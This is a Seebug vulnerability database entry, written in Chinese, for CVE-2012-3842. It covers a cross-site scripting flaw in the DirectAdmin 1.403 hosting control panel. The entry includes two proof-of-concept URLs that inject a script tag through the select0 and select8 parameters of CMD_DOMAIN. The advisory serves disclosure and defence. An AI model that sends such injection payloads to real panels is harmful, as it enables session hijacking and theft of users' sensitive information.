Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:60258
HistoryJul 06, 2012 - 12:00 a.m.

DirectAdmin 1.403 跨站脚本漏洞

2012-07-0600:00:00
Root
www.seebug.org
15

EPSS

0.002

Percentile

56.1%

JSON

Bugtraq ID: 53281
CVE ID: CVE-2012-3842

DirectAdmin是一款功能强大的虚拟主机在线管理系统。
DirectAdmin脚本存在跨站脚本漏洞,允许攻击者通过select0或select8参数注入任意WEB脚本或HTML,远程攻击者可以利用漏洞获得敏感信息或劫持用户会话。
0
DirectAdmin 1.403
厂商解决方案

目前没有详细解决方案提供:
http://directadmin.com/


                                                https://your.ip.to.directadmin:2222/CMD_DOMAIN?action=select&delete=Delete&select8=testtttttttt.plaaaaaa
 %22%3Eaaaaaaaaaaaa%3Cscript%3Ealert%28VL%29%3C/script%3E
https://your.ip.to.directadmin:2222/CMD_DOMAIN?confirmed=Confirm&delete=yes&select0=testtttttttt.pl
 %3Cscript%3Ealert%28VL%29%3C/script%3E

Related

prion 1
cvelist 1
nvd 1
cve 1
prion
prion
Cross site scripting
2012-07-03 22:55:00
cvelist
cvelist
CVE-2012-3842
2012-07-03 22:00:00
nvd
nvd
CVE-2012-3842
2012-07-03 22:55:03
cve
cve
CVE-2012-3842
2012-07-03 22:55:03

EPSS

0.002

Percentile

56.1%

JSON
Related for SSV:60258
prion1cvelist1nvd1cve1